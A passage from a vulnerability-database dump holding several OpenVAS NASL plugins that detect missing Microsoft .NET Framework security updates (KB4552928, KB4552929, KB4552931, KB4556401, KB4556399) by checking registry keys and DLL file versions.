FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817116\");\n script_version(\"2020-06-09T06:40:15+0000\");\n script_cve_id(\"CVE-2020-1108\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 06:40:15 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-13 09:18:00 +0530 (Wed, 13 May 2020)\");\n script_name(\"Microsoft .NET Framework Multiple Vulnerabilities (KB4552928)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4552928\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework improperly handles web requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to conduct a denial-of-service condition and run arbitrary code in the context\n of the current user. If the current user is logged on with administrative user\n rights, an attacker could take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 version 1709.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4552928\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.16299\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n 
if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.identitymodel.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T17:44:10", "description": "This host is missing a critical security\n update according to Microsoft KB4552929", "cvss3": {}, "published": "2020-05-13T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple Vulnerabilities (KB4552929)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310817106", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817106", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right 
holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817106\");\n script_version(\"2020-06-09T06:40:15+0000\");\n script_cve_id(\"CVE-2020-1108\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 06:40:15 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-13 09:18:00 +0530 (Wed, 13 May 2020)\");\n script_name(\"Microsoft .NET Framework Multiple Vulnerabilities (KB4552929)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4552929\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework improperly handles web requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to conduct a denial-of-service condition and run arbitrary code in the context\n of the current user. 
If the current user is logged on with administrative user\n rights, an attacker could take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 version 1803.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4552929/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.17134\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item 
(registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.identitymodel.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T17:44:10", "description": "This host is missing a critical security\n update according to Microsoft KB4552931", "cvss3": {}, "published": "2020-05-13T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple Vulnerabilities (KB4552931)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], 
"modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310817104", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817104", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817104\");\n script_version(\"2020-06-09T06:40:15+0000\");\n script_cve_id(\"CVE-2020-1108\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 06:40:15 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-13 09:18:00 +0530 (Wed, 13 May 2020)\");\n script_name(\"Microsoft .NET Framework Multiple Vulnerabilities (KB4552931)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4552931\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft 
.NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework improperly handles web requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to conduct a denial-of-service condition and run arbitrary code in the context\n of the current user. If the current user is logged on with administrative user\n rights, an attacker could take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5 and 4.8 on Microsoft Windows 10 version 1903 and Microsoft Windows 10 version 1909.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4552931\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.18362\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item 
(registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.9148\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.9148\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.9148\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.9148\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.9148\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.9148\" ;\n break;\n }\n else if(version_in_range(version:dllVer, 
test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.identitymodel.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T17:44:12", "description": "This host is missing a critical security\n update according to Microsoft KB4556401", "cvss3": {}, "published": "2020-05-13T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple Vulnerabilities (KB4556401)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310817100", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817100", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817100\");\n script_version(\"2020-06-09T06:40:15+0000\");\n script_cve_id(\"CVE-2020-1108\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 06:40:15 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-13 09:18:00 +0530 (Wed, 13 May 2020)\");\n script_name(\"Microsoft .NET Framework Multiple Vulnerabilities (KB4556401)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4556401\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework improperly handles web requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to conduct a denial-of-service condition and run arbitrary code in the context\n of the current user. If the current user is logged on with administrative user\n rights, an attacker could take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4556401\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552982/kb4552982\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552946/kb4552946\n else if(version_in_range(version:dllVer, test_version:\"4.0.30319.30000\", 
test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0.30319.30000 - 4.0.30319.36626\";\n break;\n }\n # https://support.microsoft.com/en-us/help/4552923/kb4552923\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552933/kb4552933\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\";\n break;\n }\n }\n }\n if(vulnerable_range){\n break;\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552982/kb4552982\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552946/kb4552946\n else if(version_in_range(version:dllVer, test_version:\"4.0.30319.30000\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0.30319.30000 - 4.0.30319.36626\";\n break;\n }\n # https://support.microsoft.com/en-us/help/4552923/kb4552923\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552933/kb4552933\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\";\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 
(https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552982/kb4552982\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552946/kb4552946\n else if(version_in_range(version:dllVer, test_version:\"4.0.30319.30000\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0.30319.30000 - 4.0.30319.36626\";\n break;\n }\n # https://support.microsoft.com/en-us/help/4552923/kb4552923\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552933/kb4552933\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\";\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.identitymodel.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T17:44:11", "description": "This host is missing a critical security\n update according to Microsoft KB4556399", "cvss3": {}, "published": "2020-05-13T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple Vulnerabilities (KB4556399)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1066", "CVE-2020-1108", 
"CVE-2020-0605"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310817103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817103", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817103\");\n script_version(\"2020-06-09T06:40:15+0000\");\n script_cve_id(\"CVE-2020-1108\", \"CVE-2020-0605\", \"CVE-2020-1066\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 06:40:15 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-13 09:18:00 +0530 (Wed, 13 May 2020)\");\n script_name(\"Microsoft .NET Framework Multiple Vulnerabilities (KB4556399)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4556399\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", 
value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework improperly handles web requests.\n\n - An error in how .NET Framework activates COM objects.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain escalated privileges, conduct a denial-of-service condition and run\n arbitrary code in the context of the current user. If the current user is logged\n on with administrative user rights, an attacker could take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 7 SP1 and Microsoft Windows Server 2008 R2 SP1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", 